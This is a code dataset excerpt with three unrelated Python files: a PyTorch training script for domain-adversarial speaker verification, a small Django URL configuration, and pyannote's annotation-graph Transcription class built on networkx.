parser.add_argument('--lr-decay', default=0, type=float, metavar='LRD',
                    help='learning rate decay ratio (default: 0)')
parser.add_argument('--weight-decay', default=5e-4, type=float,
                    metavar='WEI', help='weight decay (default: 5e-4)')
parser.add_argument('--momentum', default=0.9, type=float,
metavar='MOM', help='momentum for sgd (default: 0.9)')
parser.add_argument('--dampening', default=0, type=float,
metavar='DAM', help='dampening for sgd (default: 0.0)')
parser.add_argument('--optimizer', default='sgd', type=str,
                    metavar='OPT', help='the optimizer to use (default: sgd)')
# Device options
parser.add_argument('--no-cuda', action='store_true', default=False,
                    help='disables CUDA training')
parser.add_argument('--gpu-id', default='1', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--seed', type=int, default=123456, metavar='S',
                    help='random seed (default: 123456)')
parser.add_argument('--log-interval', type=int, default=1, metavar='LI',
help='how many batches to wait before logging training status')
parser.add_argument('--acoustic-feature', choices=['fbank', 'spectrogram', 'mfcc'], default='fbank',
help='choose the acoustic features type.')
parser.add_argument('--makemfb', action='store_true', default=False,
help='need to make mfb file')
parser.add_argument('--makespec', action='store_true', default=False,
help='need to make spectrograms file')
args = parser.parse_args()
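# Example invocation (all paths and the model name below are placeholders,
# not taken from the original recipes):
#   python train_domres_egs.py --train-dir data/train_egs --valid-dir data/valid_egs \
#       --test-dir data/vox1_test --model LoResNet10 --loss-type soft --gpu-id 0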
# Set the device to use by setting CUDA_VISIBLE_DEVICES env variable in
# order to prevent any memory allocation on unused GPUs
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
args.cuda = not args.no_cuda and torch.cuda.is_available()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# torch.multiprocessing.set_sharing_strategy('file_system')
if args.cuda:
torch.cuda.manual_seed_all(args.seed)
cudnn.benchmark = True
# Create logger and define a visualization SummaryWriter instance
writer = SummaryWriter(logdir=args.check_path, filename_suffix='_first')
sys.stdout = NewLogger(osp.join(args.check_path, 'log.txt'))
kwargs = {'num_workers': args.nj, 'pin_memory': False} if args.cuda else {}
if not os.path.exists(args.check_path):
os.makedirs(args.check_path)
opt_kwargs = {'lr': args.lr,
'lr_decay': args.lr_decay,
'weight_decay': args.weight_decay,
'dampening': args.dampening,
'momentum': args.momentum}
l2_dist = nn.CosineSimilarity(dim=1, eps=1e-6) if args.cos_sim else PairwiseDistance(2)
if args.acoustic_feature == 'fbank':
transform = transforms.Compose([
concateinputfromMFB(num_frames=c.NUM_FRAMES_SPECT, remove_vad=args.remove_vad),
# varLengthFeat(),
to2tensor()
])
transform_T = transforms.Compose([
ConcateVarInput(num_frames=c.NUM_FRAMES_SPECT, remove_vad=args.remove_vad),
# to2tensor()
])
transform_V = transforms.Compose([
varLengthFeat(remove_vad=args.remove_vad),
to2tensor()
])
else:
transform = transforms.Compose([
truncatedinput(),
toMFB(),
totensor(),
# tonormal()
])
file_loader = read_audio
# pdb.set_trace()
torch.multiprocessing.set_sharing_strategy('file_system')
if args.feat_format == 'kaldi':
file_loader = read_mat
elif args.feat_format == 'npy':
file_loader = np.load
train_dir = EgsDataset(dir=args.train_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,
domain=args.domain)
test_dir = ScriptTestDataset(dir=args.test_dir, loader=np.load, transform=transform_T)
if len(test_dir) < args.veri_pairs:
args.veri_pairs = len(test_dir)
print('There are %d verification pairs.' % len(test_dir))
else:
test_dir.partition(args.veri_pairs)
valid_dir = EgsDataset(dir=args.valid_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,
domain=args.domain)
def main():
# Views the training images and displays the distance on anchor-negative and anchor-positive
# test_display_triplet_distance = False
# print the experiment configuration
print('\nCurrent time is \33[91m{}\33[0m.'.format(str(time.asctime())))
print('Parsed options: {}'.format(vars(args)))
print('Number of Speakers: {}.\n'.format(train_dir.num_spks))
# instantiate model and initialize weights
kernel_size = args.kernel_size.split(',')
kernel_size = [int(x) for x in kernel_size]
padding = [int((x - 1) / 2) for x in kernel_size]
kernel_size = tuple(kernel_size)
padding = tuple(padding)
channels = args.channels.split(',')
channels = [int(x) for x in channels]
model_kwargs = {'embedding_size_a': args.embedding_size_a,
'embedding_size_b': args.embedding_size_b,
'embedding_size_o': args.embedding_size_o,
'inst_norm': args.inst_norm,
'resnet_size': args.resnet_size,
'num_classes_a': train_dir.num_spks,
'num_classes_b': train_dir.num_doms,
'channels': channels,
'avg_size': args.avg_size,
'alpha': args.alpha,
'kernel_size': kernel_size,
'padding': padding,
'dropout_p': args.dropout_p}
print('Model options: {}'.format(model_kwargs))
model = create_model(args.model, **model_kwargs)
start_epoch = 0
if args.save_init and not args.finetune:
check_path = '{}/checkpoint_{}.pth'.format(args.check_path, start_epoch)
torch.save(model, check_path)
if args.resume:
if os.path.isfile(args.resume):
print('=> loading checkpoint {}'.format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
filtered = {k: v for k, v in checkpoint['state_dict'].items() if 'num_batches_tracked' not in k}
model_dict = model.state_dict()
model_dict.update(filtered)
model.load_state_dict(model_dict)
#
# model.dropout.p = args.dropout_p
else:
print('=> no checkpoint found at {}'.format(args.resume))
ce_criterion = nn.CrossEntropyLoss()
if args.loss_type == 'soft':
xe_criterion = None
elif args.loss_type == 'asoft':
ce_criterion = None
        model.classifier_spk = AngleLinear(in_features=args.embedding_size_a, out_features=train_dir.num_spks, m=args.m)
        xe_criterion = AngleSoftmaxLoss(lambda_min=args.lambda_min, lambda_max=args.lambda_max)
    elif args.loss_type == 'center':
        xe_criterion = CenterLoss(num_classes=train_dir.num_spks, feat_dim=args.embedding_size_a)
    elif args.loss_type == 'amsoft':
        ce_criterion = None
        model.classifier_spk = AdditiveMarginLinear(feat_dim=args.embedding_size_a, n_classes=train_dir.num_spks)
        xe_criterion = AMSoftmaxLoss(margin=args.margin, s=args.s)
optimizer = create_optimizer(model.parameters(), args.optimizer, **opt_kwargs)
if args.loss_type == 'center':
optimizer = torch.optim.SGD([{'params': xe_criterion.parameters(), 'lr': args.lr * 5},
{'params': model.parameters()}],
lr=args.lr, weight_decay=args.weight_decay,
momentum=args.momentum)
if args.finetune:
if args.loss_type == 'asoft' or args.loss_type == 'amsoft':
            classifier_params = list(map(id, model.classifier_spk.parameters()))
            rest_params = filter(lambda p: id(p) not in classifier_params, model.parameters())
            optimizer = torch.optim.SGD([{'params': model.classifier_spk.parameters(), 'lr': args.lr * 5},
{'params': rest_params}],
lr=args.lr, weight_decay=args.weight_decay,
momentum=args.momentum)
if args.scheduler == 'exp':
scheduler = ExponentialLR(optimizer, gamma=args.gamma)
else:
milestones = args.milestones.split(',')
milestones = [int(x) for x in milestones]
milestones.sort()
scheduler = MultiStepLR(optimizer, milestones=milestones, gamma=0.1)
ce = [ce_criterion, xe_criterion]
start = args.start_epoch + start_epoch
print('Start epoch is : ' + str(start))
# start = 0
end = start + args.epochs
train_loader = torch.utils.data.DataLoader(train_dir, batch_size=args.batch_size, shuffle=False, **kwargs)
valid_loader = torch.utils.data.DataLoader(valid_dir, batch_size=int(args.batch_size / 2), shuffle=False, **kwargs)
test_loader = torch.utils.data.DataLoader(test_dir, batch_size=args.test_batch_size, shuffle=False, **kwargs)
# sitw_test_loader = torch.utils.data.DataLoader(sitw_test_dir, batch_size=args.test_batch_size,
# shuffle=False, **kwargs)
# sitw_dev_loader = torch.utils.data.DataLoader(sitw_dev_part, batch_size=args.test_batch_size, shuffle=False,
# **kwargs)
if args.cuda:
model = model.cuda()
for i in range(len(ce)):
            if ce[i] is not None:
ce[i] = ce[i].cuda()
print('Dropout is {}.'.format(model.dropout_p))
for epoch in range(start, end):
# pdb.set_trace()
print('\n\33[1;34m Current \'{}\' learning rate is '.format(args.optimizer), end='')
for param_group in optimizer.param_groups:
print('{:.5f} '.format(param_group['lr']), end='')
print(' \33[0m')
if epoch % 2 == 1 and epoch != (end - 1):
test(test_loader, valid_loader, model, epoch)
train(train_loader, model, ce, optimizer, epoch)
if epoch % 4 == 1 or epoch == (end - 1):
check_path = '{}/checkpoint_{}.pth'.format(args.check_path, epoch)
torch.save({'epoch': epoch,
'state_dict': model.state_dict(),
'criterion': ce},
check_path)
scheduler.step()
# exit(1)
extract_dir = KaldiExtractDataset(dir=args.test_dir, transform=transform_V, filer_loader=np.load)
extract_loader = torch.utils.data.DataLoader(extract_dir, batch_size=1, shuffle=False, **kwargs)
xvector_dir = args.check_path
xvector_dir = xvector_dir.replace('checkpoint', 'xvector')
verification_extract(extract_loader, model, xvector_dir)
verify_dir = ScriptVerifyDataset(dir=args.test_dir, trials_file=args.trials, xvectors_dir=xvector_dir,
loader=read_vec_flt)
verify_loader = torch.utils.data.DataLoader(verify_dir, batch_size=64, shuffle=False, **kwargs)
verification_test(test_loader=verify_loader, dist_type=('cos' if args.cos_sim else 'l2'),
log_interval=args.log_interval)
writer.close()
def train(train_loader, model, ce, optimizer, epoch):
# switch to evaluate mode
model.train()
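    # Gradient reversal lambda schedule from domain-adversarial training
    # (Ganin & Lempitsky, 2015): lambda ramps smoothly from 0 to 1 as
    # training progresses, phasing in the adversarial domain signal
    # instead of destabilizing early epochs.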
lambda_ = 2. / (1 + np.exp(-10. * epoch / args.epochs)) - 1.
model.grl.set_lambda(lambda_)
correct_a = 0.
correct_b = 0.
total_datasize = 0.
total_loss_a = 0.
total_loss_b = 0.
total_loss_c = 0.
total_loss = 0.
# for param_group in optimizer.param_groups:
# print('\33[1;34m Optimizer \'{}\' learning rate is {}.\33[0m'.format(args.optimizer, param_group['lr']))
ce_criterion, xe_criterion = ce
pbar = tqdm(enumerate(train_loader))
output_softmax = nn.Softmax(dim=1)
for batch_idx, (data, label_a, label_b) in pbar:
if args.cuda:
data = data.cuda()
data, label_a = Variable(data), Variable(label_a)
label_b = Variable(label_b)
logits_spk, feat_spk, logits_dom, feat_dom = model(data)
true_labels_a = label_a.cuda()
true_labels_b = label_b.cuda()
# pdb.set_trace()
# cos_theta, phi_theta = classfier
spk_label = logits_spk
        dom_label = logits_dom
if args.loss_type == 'soft':
spk_loss = ce_criterion(logits_spk, true_labels_a)
elif args.loss_type == 'asoft':
spk_label, _ = spk_label
spk_loss = xe_criterion(logits_spk, true_labels_a)
elif args.loss_type == 'center':
loss_cent = ce_criterion(logits_spk, true_labels_a)
loss_xent = xe_criterion(feat_spk, true_labels_a)
spk_loss = args.loss_ratio * loss_xent + loss_cent
elif args.loss_type == 'amsoft':
spk_loss = xe_criterion(logits_spk, true_labels_a)
        dom_loss = (args.dom_ratio * ce_criterion(dom_label, true_labels_b))
loss = spk_loss + dom_loss
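        # Optional orthogonality regularizer: the squared cosine similarity
        # below pushes each utterance's speaker and domain embeddings toward
        # orthogonality, so the two branches carry complementary information.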
if args.sim_ratio:
spk_dom_sim_loss = torch.cosine_similarity(feat_spk, feat_dom, dim=1).pow(2).mean()
spk_dom_sim_loss = args.sim_ratio * spk_dom_sim_loss
loss += spk_dom_sim_loss
predicted_labels_a = output_softmax(spk_label)
predicted_one_labels_a = torch.max(predicted_labels_a, dim=1)[1]
minibatch_correct_a = float((predicted_one_labels_a.cuda() == true_labels_a.cuda()).sum().item())
minibatch_acc_a = minibatch_correct_a / len(predicted_one_labels_a)
correct_a += minibatch_correct_a
        predicted_labels_b = output_softmax(dom_label)
predicted_one_labels_b = torch.max(predicted_labels_b, dim=1)[1]
minibatch_correct_b = float((predicted_one_labels_b.cuda() == true_labels_b.cuda()).sum().item())
minibatch_acc_b = minibatch_correct_b / len(predicted_one_labels_b)
correct_b += minibatch_correct_b
total_datasize += len(predicted_one_labels_a)
total_loss_a += float(spk_loss.item())
total_loss_b += float(dom_loss.item())
total_loss_c += float(spk_dom_sim_loss.item()) if args.sim_ratio else 0.
total_loss += float(loss.item())
# compute gradient and update weights
optimizer.zero_grad()
loss.backward()
if args.loss_type == 'center' and args.loss_ratio != 0:
for param in xe_criterion.parameters():
param.grad.data *= (1. / args.loss_ratio)
optimizer.step()
if batch_idx % args.log_interval == 0:
pbar.set_description(
'Train Epoch {:2d}: [{:4d}/{:4d}({:3.0f}%)] AvgLoss: {:.4f} SpkLoss: {:.4f} DomLoss: {:.4f} ' \
'SimLoss: {:.4f} Batch Accuracy: Spk: {:.4f}%, Dom: {:.4f}%'.format(
epoch,
batch_idx,
len(train_loader),
100. * batch_idx / len(train_loader),
total_loss / (batch_idx + 1),
total_loss_a / (batch_idx + 1),
total_loss_b / (batch_idx + 1),
total_loss_c / (batch_idx + 1),
100. * minibatch_acc_a,
100. * minibatch_acc_b))
    print('\n\33[91mTrain Epoch {}: Avg loss: {:.4f} Spk Loss: {:.4f} Dom Loss: {:.4f} .'.format(
        epoch, total_loss / len(train_loader), total_loss_a / len(train_loader),
        total_loss_b / len(train_loader)))
    print('Spk Accuracy:{:.4f}%, Dom Accuracy:{:.4f}%.\33[0m'.format(100 * correct_a / total_datasize,
                                                                     100 * correct_b / total_datasize))
writer.add_scalar('Train/Spk_Accuracy', correct_a / total_datasize, epoch)
writer.add_scalar('Train/Dom_Accuracy', correct_b / total_datasize, epoch)
writer.add_scalar('Train/Loss', total_loss / len(train_loader), epoch)
torch.cuda.empty_cache()
def test(test_loader, valid_loader, model, epoch):
# switch to evaluate mode
model.eval()
valid_pbar = tqdm(enumerate(valid_loader))
softmax = nn.Softmax(dim=1)
correct_a = 0.
correct_b = 0.
total_datasize = 0.
for batch_idx, (data, label_a, label_b) in valid_pbar:
data = Variable(data.cuda())
# compute output
out_a, _, out_b, _ = model(data)
if args.loss_type == 'asoft':
predicted_labels_a, _ = out_a
else:
predicted_labels_a = out_a
predicted_labels_b = out_b
true_labels_a = Variable(label_a.cuda())
true_labels_b = Variable(label_b.cuda())
# pdb.set_trace()
predicted_one_labels_a = softmax(predicted_labels_a)
predicted_one_labels_a = torch.max(predicted_one_labels_a, dim=1)[1]
batch_correct_a = (predicted_one_labels_a.cuda() == true_labels_a.cuda()).sum().item()
minibatch_acc_a = float(batch_correct_a / len(predicted_one_labels_a))
correct_a += batch_correct_a
predicted_one_labels_b = softmax(predicted_labels_b)
predicted_one_labels_b = torch.max(predicted_one_labels_b, dim=1)[1]
batch_correct_b = (predicted_one_labels_b.cuda() == true_labels_b.cuda()).sum().item()
minibatch_acc_b = float(batch_correct_b / len(predicted_one_labels_b))
correct_b += batch_correct_b
total_datasize += len(predicted_one_labels_a)
if batch_idx % args.log_interval == 0:
valid_pbar.set_description(
'Valid Epoch: {:2d} [{:8d}/{:8d} ({:3.0f}%)] Batch Spk Accuracy: {:.4f}% Dom Accuracy: {:.4f}%'.format(
epoch,
batch_idx * len(data),
len(valid_loader.dataset),
100. * batch_idx / len(valid_loader),
100. * minibatch_acc_a,
100. * minibatch_acc_b
))
spk_valid_accuracy = 100. * correct_a / total_datasize
dom_valid_accuracy = 100. * correct_b / total_datasize
writer.add_scalar('Test/Spk_Valid_Accuracy', spk_valid_accuracy, epoch)
writer.add_scalar('Test/Dom_Valid_Accuracy', dom_valid_accuracy, epoch)
torch.cuda.empty_cache()
labels, distances = [], []
pbar = tqdm(enumerate(test_loader))
for batch_idx, (data_a, data_p, label) in pbar:
vec_a_shape = data_a.shape
vec_p_shape = data_p.shape
# pdb.set_trace()
data_a = data_a.reshape(vec_a_shape[0] * vec_a_shape[1], 1, vec_a_shape[2], vec_a_shape[3])
data_p = data_p.reshape(vec_p_shape[0] * vec_p_shape[1], 1, vec_p_shape[2], vec_p_shape[3])
if args.cuda:
data_a, data_p = data_a.cuda(), data_p.cuda()
data_a, data_p, label = Variable(data_a), Variable(data_p), Variable(label)
# compute output
_, out_a_, _, _ = model(data_a)
_, out_p_, _, _ = model(data_p)
# out_a = out_a_
# out_p = out_p_
out_a = out_a_.reshape(vec_a_shape[0], vec_a_shape[1], args.embedding_size_a).mean(dim=1)
out_p = out_p_.reshape(vec_p_shape[0], vec_p_shape[1], args.embedding_size_a).mean(dim=1)
dists = l2_dist.forward(out_a, out_p) # torch.sqrt(torch.sum((out_a - out_p) ** 2, 1)) # euclidean distance
# dists = dists.reshape(vec_shape[0], vec_shape[1]).mean(dim=1)
dists = dists.data.cpu().numpy()
distances.append(dists)
labels.append(label.data.cpu().numpy())
if batch_idx % args.log_interval == 0:
pbar.set_description('Test Epoch: {} [{}/{} ({:.0f}%)]'.format(
epoch, batch_idx * len(data_a), len(test_loader.dataset), 100. * batch_idx / len(test_loader)))
labels = np.array([sublabel for label in labels for sublabel in label])
distances = np.array([subdist for dist in distances for subdist in dist])
eer, eer_threshold, accuracy = evaluate_kaldi_eer(distances, labels, cos=args.cos_sim, re_thre=True)
writer.add_scalar('Test/EER', 100. * eer, epoch)
writer.add_scalar('Test/Threshold', eer_threshold, epoch)
mindcf_01, mindcf_001 = evaluate_kaldi_mindcf(distances, labels)
writer.add_scalar('Test/mindcf-0.01', mindcf_01, epoch)
writer.add_scalar('Test/mindcf-0.001', mindcf_001, epoch)
dist_type = 'cos' if args.cos_sim else 'l2'
print('\nFor %s_distance, ' % dist_type)
    print(' \33[91mTest Spk EER is {:.4f}%, Threshold is {}'.format(100. * eer, eer_threshold))
print(' mindcf-0.01 {:.4f}, mindcf-0.001 {:.4f},'.format(mindcf_01, mindcf_001))
print(' Valid Spk Accuracy is %.4f %%, Dom Accuracy is %.4f %% .\33[0m' % (spk_valid_accuracy, dom_valid_accuracy))
torch.cuda.empty_cache()
if __name__ == '__main__':
main()
| TrainAndTest/Spectrogram/train_domres_egs.py | 29,807 | … | 1,733 | en | 0.505033 |
""" Contains the urls for the maingui module"""
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('login', views.login, name='login'),
]
| maingui/urls.py | 204 | Contains the urls for the maingui module | 40 | en | 0.70313 |
#!/usr/bin/env python
# encoding: utf-8
# The MIT License (MIT)
# Copyright (c) 2014 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# AUTHORS
# Hervé BREDIN - http://herve.niderb.fr
from __future__ import unicode_literals
import networkx as nx
from networkx.readwrite.json_graph import node_link_data, node_link_graph
import itertools
from .time import T, TStart, TEnd
from .segment import Segment
from .json import PYANNOTE_JSON_TRANSCRIPTION
from .util import pairwise
class Transcription(nx.MultiDiGraph):
"""Transcription stored as annotation graph"""
def __init__(self, graph=None, **attrs):
super(Transcription, self).__init__(data=graph)
self.graph.update(attrs)
def drifting(self):
"""Get list of drifting times"""
return [n for n in self if n.drifting]
def anchored(self):
"""Get list of anchored times"""
return [n for n in self if n.anchored]
def add_edge(self, t1, t2, key=None, attr_dict=None, **attrs):
"""Add annotation to the graph between times t1 and t2
Parameters
----------
t1, t2: float, str or None
data : dict, optional
{annotation_type: annotation_value} dictionary
Example
-------
>>> G = Transcription()
        >>> G.add_edge(T(1.), T(), speaker='John', speech='Hello world!')
"""
t1 = T(t1)
t2 = T(t2)
# make sure Ts are connected in correct chronological order
if t1.anchored and t2.anchored:
assert t1 <= t2
super(Transcription, self).add_edge(
t1, t2, key=key, attr_dict=attr_dict, **attrs)
def relabel_drifting_nodes(self, mapping=None):
"""Relabel drifting nodes
Parameters
----------
mapping : dict, optional
A dictionary with the old labels as keys and new labels as values.
Returns
-------
g : Transcription
New annotation graph
mapping : dict
A dictionary with the new labels as keys and old labels as values.
Can be used to get back to the version before relabelling.
"""
if mapping is None:
old2new = {n: T() for n in self.drifting()}
else:
old2new = dict(mapping)
new2old = {new: old for old, new in old2new.iteritems()}
return nx.relabel_nodes(self, old2new, copy=True), new2old
def crop(self, source, target=None):
"""Get minimum subgraph between source time and target time
Parameters
----------
source : Segment
target : float or str, optional
Returns
-------
g : Transcription
Sub-graph between source and target
"""
if isinstance(source, Segment):
source, target = source.start, source.end
source = T(source)
target = T(target)
# sorted list of anchored times will be needed later
# make sure it is computed only once
if source.anchored or target.anchored:
anchored = sorted(self.anchored())
# ~~~ from_source = set of nodes reachable from source ~~~~~~~~~~~~~~~~
# source is drifting
if source.drifting:
if source not in self:
raise ValueError(
'Drifting time %s is not in the transcription.' % source)
else:
from_source = {source} | nx.algorithms.descendants(self, source)
# source is anchored
else:
# if source is in graph, then it is easy
if source in self:
from_source = {source} | nx.algorithms.descendants(self, source)
# if source is not in graph,
# find anchored time just before source
else:
if source < anchored[0]:
from_source = set(self) # take no risk!
else:
before = [n for n in anchored if n <= source][-1]
from_source = {before} | nx.algorithms.descendants(self, before)
# ~~~ to_target = set of nodes from which target is reachable ~~~~~~~~~
# target is drifting
if target.drifting:
if target not in self:
raise ValueError(
'Drifting time %s is not in the transcription.' % target)
else:
to_target = {target} | nx.algorithms.ancestors(self, target)
else:
# if target is in graph, then it is easy
if target in self:
to_target = {target} | nx.algorithms.ancestors(self, target)
# if target is not in graph,
# find anchored time just after target
else:
if target > anchored[-1]:
to_target = set(self) # take no risk!
else:
after = [n for n in anchored if n >= target][0]
to_target = {after} | nx.algorithms.ancestors(self, after)
# union of source, target and source-to-target paths
nbunch = from_source & to_target
return self.subgraph(nbunch)
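    # Usage sketch (times are illustrative):
    #
    #     sub = transcription.crop(Segment(3.2, 7.8))
    #     # equivalently: transcription.crop(3.2, 7.8)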
# =========================================================================
def _merge(self, drifting_t, another_t):
"""Helper function to merge `drifting_t` with `another_t`
Assumes that both `drifting_t` and `another_t` exists.
Also assumes that `drifting_t` is an instance of `TFloating`
(otherwise, this might lead to weird graph configuration)
Parameters
----------
drifting_t :
Existing drifting time in graph
another_t :
Existing time in graph
"""
# drifting_t and another_t must exist in graph
# add a (t --> another_t) edge for each (t --> drifting_t) edge
for t, _, key, data in self.in_edges_iter(
nbunch=[drifting_t], data=True, keys=True
):
# use lowest unused integer in case this key already exists
if self.has_edge(t, another_t, key=key):
key = None
self.add_edge(t, another_t, key=key, attr_dict=data)
# add a (another_t --> t) edge for each (drifting_t --> t) edge
for _, t, key, data in self.edges_iter(
nbunch=[drifting_t], data=True, keys=True
):
# use lowest unused integer in case this key already exists
if self.has_edge(another_t, t, key=key):
key = None
self.add_edge(another_t, t, key=key, attr_dict=data)
# remove drifting_t node (as it was replaced by another_t)
self.remove_node(drifting_t)
def anchor(self, drifting_t, anchored_t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ D ] -- o ==> o -- [ A ] -- o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Anchor `drifting_t` at `anchored_t`
Parameters
----------
drifting_t :
Drifting time to anchor
anchored_t :
When to anchor `drifting_t`
"""
drifting_t = T(drifting_t)
anchored_t = T(anchored_t)
assert (drifting_t in self) and (drifting_t.drifting)
assert anchored_t.anchored
if anchored_t not in self:
self.add_node(anchored_t)
self._merge(drifting_t, anchored_t)
def align(self, one_t, another_t):
"""
Align two (potentially drifting) times
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ F ] -- o o o
⟍ ⟋
==> [ F ]
⟋ ⟍
o -- [ f ] -- o o o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Parameters
----------
one_t, another_t
Two times to be aligned.
Notes
-----
* If both `one_t` and `another_t` are drifting, the resulting graph
will no longer contain `one_t`.
* In case `another_t` is anchored, `align` is equivalent to `anchor`.
* `one_t` and `another_t` cannot be both anchored.
"""
one_t = T(one_t)
another_t = T(another_t)
assert one_t in self
assert another_t in self
# first time is drifting
if one_t.drifting:
self._merge(one_t, another_t)
# second time is drifting
elif another_t.drifting:
self._merge(another_t, one_t)
# both times are anchored --> FAIL
else:
raise ValueError(
'Cannot align two anchored times')
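    # Usage sketch (values are illustrative):
    #
    #     t = T()                      # new drifting time
    #     G.add_edge(T(1.0), t, speech='Hello')
    #     G.anchor(t, 2.5)             # t is merged into the anchored time 2.5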
# =========================================================================
def pre_align(self, t1, t2, t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
p -- [ t1 ] p [ t1 ]
⟍ ⟋
==> [ t ]
⟋ ⟍
p' -- [ t2 ] p' [ t2 ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
t1 = T(t1)
t2 = T(t2)
t = T(t)
# make sure --[t1] incoming edges are empty
# because they're going to be removed afterwards,
        # and we don't want to lose data
pred1 = self.predecessors(t1)
for p in pred1:
for key, data in self[p][t1].iteritems():
assert not data
# make sure --[t2] incoming edges are empty
# (for the same reason...)
pred2 = self.predecessors(t2)
for p in pred2:
for key, data in self[p][t2].iteritems():
assert not data
# let's get started (remove all incoming edges)
for p in pred1:
for key in list(self[p][t1]):
self.remove_edge(p, t1, key=key)
for p in pred2:
for key in list(self[p][t2]):
self.remove_edge(p, t2, key=key)
for p in set(pred1) | set(pred2):
self.add_edge(p, t)
self.add_edge(t, t1)
self.add_edge(t, t2)
def post_align(self, t1, t2, t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ t1 ] -- s [ t1 ] s
⟍ ⟋
==> [ t ]
⟋ ⟍
[ t2 ] -- s' [ t2 ] s'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
t1 = T(t1)
t2 = T(t2)
t = T(t)
# make sure [t1]-- outgoing edges are empty
# because they're going to be removed afterwards,
        # and we don't want to lose data
succ1 = self.successors(t1)
for s in succ1:
for key, data in self[t1][s].iteritems():
assert not data
# make sure --[t2] outgoing edges are empty
# (for the same reason...)
succ2 = self.successors(t2)
for s in succ2:
for key, data in self[t2][s].iteritems():
assert not data
# let's get started (remove all outgoing edges)
for s in succ1:
for key in list(self[t1][s]):
self.remove_edge(t1, s, key=key)
for s in succ2:
for key in list(self[t2][s]):
self.remove_edge(t2, s, key=key)
for s in set(succ1) | set(succ2):
self.add_edge(t, s)
self.add_edge(t1, t)
self.add_edge(t2, t)
# =========================================================================
def ordering_graph(self):
"""Ordering graph
t1 --> t2 in the ordering graph indicates that t1 happens before t2.
A missing edge simply means that it is not clear yet.
"""
g = nx.DiGraph()
# add times
for t in self.nodes_iter():
g.add_node(t)
# add existing edges
for t1, t2 in self.edges_iter():
g.add_edge(t1, t2)
# connect every pair of anchored times
anchored = sorted(self.anchored())
for t1, t2 in itertools.combinations(anchored, 2):
g.add_edge(t1, t2)
        # connect every time with its successors
_g = g.copy()
for t1 in _g:
for t2 in set([target for (_, target) in nx.bfs_edges(_g, t1)]):
g.add_edge(t1, t2)
return g
def temporal_sort(self):
"""Get nodes sorted in temporal order
Remark
------
This relies on a combination of temporal ordering of anchored times
and topological ordering for drifting times.
To be 100% sure that one drifting time happens before another time,
check the ordering graph (method .ordering_graph()).
"""
g = nx.DiGraph()
# add times
for t in self.nodes_iter():
g.add_node(t)
# add existing edges
for t1, t2 in self.edges_iter():
g.add_edge(t1, t2)
# connect pairs of consecutive anchored times
anchored = sorted(self.anchored())
for t1, t2 in pairwise(anchored):
g.add_edge(t1, t2)
return nx.topological_sort(g)
# =========================================================================
def ordered_edges_iter(self, nbunch=None, data=False, keys=False):
"""Return an iterator over the edges in temporal order.
Ordered edges are returned as tuples with optional data and keys
in the order (t1, t2, key, data).
Parameters
----------
nbunch : iterable container, optional (default= all nodes)
A container of nodes. The container will be iterated
through once.
data : bool, optional (default=False)
If True, return edge attribute dict with each edge.
keys : bool, optional (default=False)
If True, return edge keys with each edge.
Returns
-------
edge_iter : iterator
An iterator of (u,v), (u,v,d) or (u,v,key,d) tuples of edges.
Notes
-----
Nodes in nbunch that are not in the graph will be (quietly) ignored.
For the same reason you should not completely trust temporal_sort,
use ordered_edges_iter with care.
"""
# start by sorting nodes in temporal order
nodes = self.temporal_sort()
# only keep nbunch subset (while preserving the order)
if nbunch:
nbunch = list(nbunch)
nodes = [n for n in nodes if n in nbunch]
# iterate over edges using temporal order
return self.edges_iter(nbunch=nodes, data=data, keys=keys)
# =========================================================================
def timerange(self, t1, t2, inside=True, sort=None):
"""Infer edge timerange from graph structure
a -- ... -- [ t1 ] -- A -- ... -- B -- [ t2 ] -- ... -- b
==> [a, b] (inside=False) or [A, B] (inside=True)
Parameters
----------
t1, t2 : anchored or drifting times
inside : boolean, optional
Returns
-------
segment : Segment
"""
t1 = T(t1)
t2 = T(t2)
# in case it is not provided, compute temporal sort
if sort is None:
sort = self.temporal_sort()
# if edge start is anchored, use it as start time
if t1.anchored:
start = t1
# otherwise, look for the closest anchored time in temporal order:
# - just after if inside is True
# - just before otherwise
else:
start = None
# find time index in temporal sort
istart = sort.index(t1)
# search just before or just after depending on 'inside' value
search = sort[istart+1:] if inside else sort[istart-1::-1]
for t in search:
if t.anchored:
start = t
break
# if we could not find any anchored time
            # use document end or start depending on 'inside' value
if start is None:
start = TEnd if inside else TStart
# same treatment for the other end of edge
if t2.anchored:
end = t2
else:
end = None
iend = sort.index(t2)
search = sort[iend-1::-1] if inside else sort[iend+1:]
for t in search:
if t.anchored:
end = t
break
if end is None:
end = TStart if inside else TEnd
# return a 'Segment'
return Segment(start=start, end=end)
# =========================================================================
